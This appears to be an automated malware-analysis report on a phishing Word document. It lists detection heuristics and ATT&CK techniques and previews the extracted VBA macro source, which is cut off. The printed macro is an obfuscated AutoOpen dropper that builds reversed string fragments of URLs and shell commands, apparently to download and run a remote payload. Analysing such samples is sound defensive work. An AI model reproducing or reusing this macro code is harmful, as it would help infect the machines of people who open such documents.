MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing VBA macros. The AutoOpen macro is present and uses the Shell() function, indicating an attempt to execute arbitrary code. The ClamAV detection name 'Img.Dropper.PhishingLure' suggests a phishing lure, likely delivered as an attachment. The specific payload or destination is not directly discernible from the provided evidence.
Heuristics 7
-
ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 25600 bytes |
SHA-256: 9b871b558d7f8187fb39c260e4953580404de23ced107a1fa760a53e1f060170 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "mabSnkk"
Sub AutoOpen()
On Error Resume Next
OjnsKOAtK = WcjiRJXmw - ckGcDMwUCpL / (8343996 + sLYSvOM - 9926050 + AJWaqEczhO)
qhwiZLozP = rUFfanWtrbX - cIjwFdVurEIw / (126739 + whwHGQwUcj - 822728 + zDhiGFqEEnucF)
LcVnnMIiG = pvkUGpIjCsOdR - JzCFwPIm / (4213703 + voajoUv - 2336266 + MrnWlkOwHrjrh)
Application.Run "nnwXRRAbSG", SYjKGTzrUbRWM
KIiqJDiri = ZiYSPcs - zCkFVVbRVhTB / (8954472 + KOdSCwLsdCio - 2736116 + MRzUPJmowFnJO)
rhAXhInYJ = wZtXFYiajHoFD - zllzVSYitjTK / (5508378 + zjaOCcCuVmh - 3051630 + fHBamdSYv)
End Sub
Function SYjKGTzrUbRWM()
On Error Resume Next
MiVCB = XKEQLAKLHsiBi - cnQotJqdSiFNqj / (184011 + CwbWiXZBs - 1889069 + znizEGkmVCq)
jaiZlaDB = bBusVKzJd - upjaHUFO / (2816692 + jjrpnlBGFtfLMf - 9970921 + jiDruzzpso)
GhEwHZUq = dzPhGnuiu - EEkIrEki / (6836638 + BamlaLXBjhC - 9325092 + UYHpMZXSwFLiZS)
kQXNCdiwfoR = cFljPJSiMl + Mid(StrReverse("vuEACYCnWhALpeR.fbq+fbq)fbq+fbq93]RaHc[]gNiRTS[,fbq+fbq)111fbq+fbq]RaHc[+aEM"), 4, 62)
FnAGwQk = szNHIGQkk - YEMKFVaGB / (8772395 + wnSrnmFUtLFfH - 4892937 + rEWTBwThqGzAJi)
PiVFcVzbNJz = YFAbuLuQVTKPq - SZElHdV / (6922067 + rqfFblpmvmGm - 56482 + jflwoAAridf)
dGudUWi = jsPBERoYJk - FTffhPdjP / (3499554 + YGWjhjjAICaDEz - 4374873 + ipwcVvPjdJVTbF)
GtwDLOvzjza = DvOLJLPDNiGu + Mid(StrReverse("sIqaTkRIYRQfoEBTEfhbq+fbq4N+cQbzm"), 5, 10)
cWFivojOGl = aiKVuuRqa - qpDXNMYCILz / (3660950 + NOKFtkMTCCN - 6678856 + JGKzzPLrSqUM)
wPMMfObbGd = ijZESSHFwHkoY - NJonppb / (703538 + sINhHlvXp - 8559426 + Fdtzjub)
wupEf = MzZKZKwhdDfX - bRjwFlzUA / (6856674 + wWAjPqDuNuqTSz - 7638375 + JDSUKVliLM)
tZNGkW = PGlUIfXkFrIcNi + Mid(StrReverse("bcsbq+'+'fbqc4Nohc4fbq+fbqN+c4'+'NXc4N+c4NnohX(c4N+c4N&McH+McH = dfbq+fbqsc4N+McH+McHc4Nadasnc4N+McH+McHc4NGfc4N+c4Nlc4N( McH(bDPbDHKScsqnasJ"), 16, 123)
hqHIlzinzYl = DJOSnzkJW - wOwROqRiPkbl / (4201877 + CpZlmiiDnj - 6972408 + vliUaLOuN)
WpBwG = DMukudAvmSoqPw - wWoFubOhBvj / (729641 + JQWbKElMqCnADs - 9382987 + ZEVjuboao)
ppvbiUK = XoftpOZFl - vMfKMNIUAE / (8423452 + RPcqKXAibvnr - 6390226 + jzMZazGZWMZKUj)
qpNGvd = iJbMMPf + Mid(StrReverse("SXDGzDjzXjBaPaqN+c4Nz.c4N+c4Noc.kcMcH+McH4N+c4Ncahsc4N+c4NehtmoMcH+McHrfzyc4N+c4Nob/c4McH+McHN+c4N'+'/:ptthc4N+c4N?/c4N+c4NAQIjc4fbq+fbqN+c4Nf'+'bq+fbqG/c4N+c4Nmocc4N+c4N.c4N+c4NnzIHsahlv"), 9, 164)
fCbGKVi = CFCvzYo - PhLIbducrsP / (3332831 + DTPHVERtaQfNVY - 8391788 + iWnkhEz)
QwPWH = LzFjLiYB - EzmnoiUWkoRf / (8990310 + FCYNVbj - 3479343 + THvWwkhvrifQYF)
lpHTSzZF = qrTOwPicR - zdnRCZBmBSjsI / (4233746 + DtZAPpjzIXiI - 3527197 + iliidzHudp)
mwqEav = UajaoWQRz + Mid(StrReverse("XDonitrcKQN+c4N ,fbq+fbq)(c4N+c4N9c4N+c4NTc4N+McH+McHc4NZgNs3Eis3Erc4N+fbq+fbqcMcH+McH4Nfbq+fbqtS'+'oT9TZ.cfsaGc4N+cfbq+fbq4Nfc4NMcH+fbq+fbqMcH+c4Nfbq+'+'fbqlc4N+cs"), 2, 153)
hHFHJlcUOC = btWJcBDSjfuYRj - ThCOfWfJP / (6836320 + lLJKYZuLqbLbCc - 4893035 + bOjRnuMEFhi)
BHnssvN = awkGZfQ - JVGUdFspHFzmG / (8204807 + ufSIqwF - 950145 + rrltqECWLhXFH)
iJKWr = nhCXzAhwz - sqbHXatDQQcm / (3931426 + wCDdaYTwmQibob - 1543323 + IutBBAd)
famiviE = iiXmjzj + Mid(StrReverse("vXMqbJIuuRzHHatLOk + cilbupfbq+f'+'bq:vc4N+c4NneGfl = c4McH+McHN+c4Nfbq+fbqCDc4N+c4NSc4N+cfbq+fb'+'q4NGfl;'+'c4N+c4Nfbq+fbq)ohX?ohX(tc4N+c4NilpS.oc4N+c4NhX/kMcH+McHc4N+c4NJ3c4N+c4NwEec4N+c4N/mocc4NOURUYciiSdNDkcKqGSEbD"), 22, 179)
Itzvwib = YQuELdvmSv - HisSzwYI / (5823144 + lAJudcOkCNHEY - 4078906 + HwSRDzVXdjEJ)
FzcQCfoAdmE = GaVoajnPlJhAhB - iEDJXjpBG / (8373269 + qPcjKZTTdcr - 3513987 + shVWnkQVzFo)
iSnXBdsp = jvlNQYPzzq - nEwIhOYmrm / (4778381 + pKTOVbEtJ - 7675319 + iihFNEcV)
XZhWlNCtV = zlnTprmBNDYuzE + Mid(StrReverse("cjUikzF( ()McHXMcfbq+'+'fbqH+]31[D'+'ILleHSmCdYO"), 6, 36)
FqGcojDXZjX = HiwCwJtVuwNz - UizILiORtOicCa / (8713928 + zUqqWWzlCQuiz - 7069096 + wjUUwiz)
YAncEGjVMjt = kiTOPRauj - dzcWJaw / (5879706 + FvojSIJhs
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.